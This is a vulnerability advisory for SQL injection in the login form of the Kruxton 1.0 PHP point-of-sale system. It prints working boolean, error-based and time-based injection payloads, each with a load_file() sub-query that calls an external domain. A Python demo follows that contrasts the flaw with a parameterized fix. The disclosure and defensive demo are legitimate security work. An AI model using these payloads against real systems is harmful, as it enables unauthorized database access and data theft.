Headline
Kruxton 1.0 SQL Injection
Kruxton version 1.0 suffers from a remote SQL injection vulnerability.
## Title: kruxton-1.0-Multiple-SQLi
## Author: nu11secur1ty
## Date: 04/15/2024
## Vendor: https://www.mayurik.com/
## Software: https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The username parameter of the login form appears to be vulnerable to SQL injection attacks. The payload `'+(select load_file('\\\\t0u6cqoe8kv4cpolkvjk3zq37udn1dp4sskfa3z.tupaciganka.com\\ddi'))+'` was submitted in the username parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a host on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed (an out-of-band confirmation; it works only when the MySQL server is permitted to resolve UNC paths, which is typical for Windows hosts). An attacker can use this vulnerability to extract the contents of the application's database.

STATUS: HIGH - Vulnerability

[+] Payload:

```mysql
---
Parameter: username (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: [email protected]'+(select load_file('\\\\t0u6cqoe8kv4cpolkvjk3zq37udn1dp4sskfa3z.tupaciganka.com\\ddi'))+'' OR NOT 7810=7810 OR 'LaNe'='bRUy&password=v0N!p1j!S6

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: [email protected]'+(select load_file('\\\\t0u6cqoe8kv4cpolkvjk3zq37udn1dp4sskfa3z.tupaciganka.com\\ddi'))+'' AND (SELECT 1998 FROM(SELECT COUNT(*),CONCAT(0x7178786b71,(SELECT (ELT(1998=1998,1))),0x716b627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) OR 'jdui'='fNTo&password=v0N!p1j!S6

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: [email protected]'+(select load_file('\\\\t0u6cqoe8kv4cpolkvjk3zq37udn1dp4sskfa3z.tupaciganka.com\\ddi'))+'' AND (SELECT 2923 FROM (SELECT(SLEEP(7)))UJBe) OR 'ffIk'='SAqf&password=v0N!p1j!S6
---
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2023/kruxton-1.0/Multiple-SQLi)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2024/04/kruxton-10-multiple-sqli.html)

## Time spent:
01:15:00
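As an added example (not part of the advisory and not code from the Kruxton application), the script below shows why the boolean-based blind payload listed above turns a login check into a true/false oracle, and what the parameterized fix looks like. It assumes a login query of the shape `SELECT ... WHERE username='...' AND password='...'` built by string concatenation; the users table and its rows are constructed sample data, and the MySQL-only `load_file()` sub-query is dropped because the in-memory SQLite database used here has no `load_file()`.

```python
import sqlite3


def make_db():
    """Constructed sample data: a one-row users table (assumption, not the real schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.execute("INSERT INTO users (username, password) VALUES ('admin', 's3cret')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Query assembled by string concatenation: the flaw class the advisory describes."""
    sql = (
        "SELECT id FROM users WHERE username='" + username
        + "' AND password='" + password + "'"
    )
    return conn.execute(sql).fetchone() is not None


def login_safe(conn, username, password):
    """Same check with bound parameters: input can never change the query structure."""
    sql = "SELECT id FROM users WHERE username=? AND password=?"
    return conn.execute(sql, (username, password)).fetchone() is not None


# The tail of the advisory's first payload (load_file() sub-query removed).
# sqlmap sends the condition once false (7810=7810 negated) and once true
# (7810=7811 negated) and compares the two responses.
PAYLOAD_FALSE = "x' OR NOT 7810=7810 OR 'LaNe'='bRUy"
PAYLOAD_TRUE = "x' OR NOT 7810=7811 OR 'LaNe'='bRUy"


def blind_oracle_works(login, conn):
    """True when the injected true/false conditions produce different outcomes,
    i.e. the login endpoint leaks one bit per request (boolean-based blind)."""
    wrong_pw = "wrong"
    return login(conn, PAYLOAD_TRUE, wrong_pw) != login(conn, PAYLOAD_FALSE, wrong_pw)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable login bypassed:", login_vulnerable(db, PAYLOAD_TRUE, "wrong"))
    print("vulnerable login is an oracle:", blind_oracle_works(login_vulnerable, db))
    print("safe login is an oracle:", blind_oracle_works(login_safe, db))
```

With the concatenated query, `PAYLOAD_TRUE` evaluates to `username='x' OR NOT 7810=7811 OR ('LaNe'='bRUy' AND password='wrong')`, which is true regardless of the password, while `PAYLOAD_FALSE` is false; that difference is the oracle sqlmap then drives to read the database one bit at a time. The parameterized version treats the whole payload as a username string and returns false for both.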